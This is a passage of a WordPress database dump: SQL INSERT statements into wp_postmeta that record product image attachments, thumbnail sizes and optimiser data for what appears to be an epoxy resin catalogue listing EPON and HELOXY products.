INSERT INTO `wp_postmeta` VALUES (18257, 1898, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:22:"2016/08/EPON-1002F.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"EPON-1002F-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"EPON-1002F-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"EPON-1002F-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"EPON-1002F-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"EPON-1002F-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"EPON-1002F-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"EPON-1002F-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"EPON-1002F-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18258, 937, '_thumbnail_id', '1898'); 
INSERT INTO `wp_postmeta` VALUES (18259, 937, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18260, 1899, '_wp_attached_file', '2016/08/EPON-1004F.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18261, 1899, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:22:"2016/08/EPON-1004F.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"EPON-1004F-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"EPON-1004F-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"EPON-1004F-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"EPON-1004F-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"EPON-1004F-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"EPON-1004F-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"EPON-1004F-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"EPON-1004F-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18262, 939, '_thumbnail_id', '1899'); 
INSERT INTO `wp_postmeta` VALUES (18263, 939, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18264, 1900, '_wp_attached_file', '2016/08/EPON-1007F.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18265, 1900, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:22:"2016/08/EPON-1007F.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"EPON-1007F-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"EPON-1007F-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"EPON-1007F-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"EPON-1007F-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"EPON-1007F-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"EPON-1007F-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"EPON-1007F-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"EPON-1007F-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18266, 941, '_thumbnail_id', '1900'); 
INSERT INTO `wp_postmeta` VALUES (18267, 941, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18268, 1901, '_wp_attached_file', '2016/08/EPON-1031.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18269, 1901, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/EPON-1031.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"EPON-1031-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"EPON-1031-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"EPON-1031-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"EPON-1031-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"EPON-1031-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"EPON-1031-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"EPON-1031-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"EPON-1031-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18270, 486, '_edit_lock', '1474469888:3'); 
INSERT INTO `wp_postmeta` VALUES (18271, 486, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (18272, 948, '_thumbnail_id', '1901'); 
INSERT INTO `wp_postmeta` VALUES (18273, 948, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18274, 1902, '_wp_attached_file', '2016/08/EPON-8021.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18275, 1902, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/EPON-8021.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"EPON-8021-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"EPON-8021-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"EPON-8021-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"EPON-8021-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"EPON-8021-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"EPON-8021-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"EPON-8021-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"EPON-8021-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18276, 970, '_thumbnail_id', '1902'); 
INSERT INTO `wp_postmeta` VALUES (18277, 970, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18278, 1903, '_wp_attached_file', '2016/08/EPON-8132.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18279, 1903, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/EPON-8132.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"EPON-8132-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"EPON-8132-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"EPON-8132-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"EPON-8132-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"EPON-8132-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"EPON-8132-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"EPON-8132-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"EPON-8132-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"9";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18280, 912, '_thumbnail_id', '1903'); 
INSERT INTO `wp_postmeta` VALUES (18281, 912, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18282, 1904, '_wp_attached_file', '2016/08/EPON-8280.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18283, 1905, '_wp_attached_file', '2016/09/epoxy-resin-sytems.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18284, 1904, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/EPON-8280.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"EPON-8280-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"EPON-8280-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"EPON-8280-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"EPON-8280-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"EPON-8280-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"EPON-8280-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"EPON-8280-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"EPON-8280-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18285, 1905, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5626;s:6:"height";i:3453;s:4:"file";s:30:"2016/09/epoxy-resin-sytems.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"epoxy-resin-sytems-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"epoxy-resin-sytems-800x491.jpg";s:5:"width";i:800;s:6:"height";i:491;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:30:"epoxy-resin-sytems-768x471.jpg";s:5:"width";i:768;s:6:"height";i:471;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"epoxy-resin-sytems-1600x982.jpg";s:5:"width";i:1600;s:6:"height";i:982;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:30:"epoxy-resin-sytems-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:30:"epoxy-resin-sytems-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:30:"epoxy-resin-sytems-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:30:"epoxy-resin-sytems-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18286, 891, '_thumbnail_id', '1904'); 
INSERT INTO `wp_postmeta` VALUES (18287, 891, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18288, 1906, '_wp_attached_file', '2016/08/EPON-8281.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18289, 1906, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/EPON-8281.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"EPON-8281-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"EPON-8281-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"EPON-8281-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"EPON-8281-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"EPON-8281-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"EPON-8281-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"EPON-8281-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"EPON-8281-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"9";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18290, 895, '_thumbnail_id', '1906'); 
INSERT INTO `wp_postmeta` VALUES (18291, 895, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18292, 1907, '_wp_attached_file', '2016/08/EPON-58005.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18293, 1907, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:22:"2016/08/EPON-58005.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"EPON-58005-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"EPON-58005-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"EPON-58005-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"EPON-58005-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"EPON-58005-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"EPON-58005-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"EPON-58005-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"EPON-58005-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18294, 977, '_thumbnail_id', '1907'); 
INSERT INTO `wp_postmeta` VALUES (18295, 977, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18296, 1908, '_wp_attached_file', '2016/08/EPON-SU-8.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18297, 1908, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/EPON-SU-8.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"EPON-SU-8-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"EPON-SU-8-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"EPON-SU-8-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"EPON-SU-8-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"EPON-SU-8-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"EPON-SU-8-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"EPON-SU-8-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"EPON-SU-8-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18298, 952, '_thumbnail_id', '1908'); 
INSERT INTO `wp_postmeta` VALUES (18299, 952, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18300, 1909, '_wp_attached_file', '2016/09/HELOXY-48.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18301, 1909, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/09/HELOXY-48.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"HELOXY-48-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"HELOXY-48-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"HELOXY-48-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"HELOXY-48-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"HELOXY-48-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"HELOXY-48-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"HELOXY-48-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"HELOXY-48-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"9";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18302, 1221, '_thumbnail_id', '1909'); 
INSERT INTO `wp_postmeta` VALUES (18303, 1221, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18304, 1910, '_wp_attached_file', '2016/08/HELOXY-61.jpg'); 
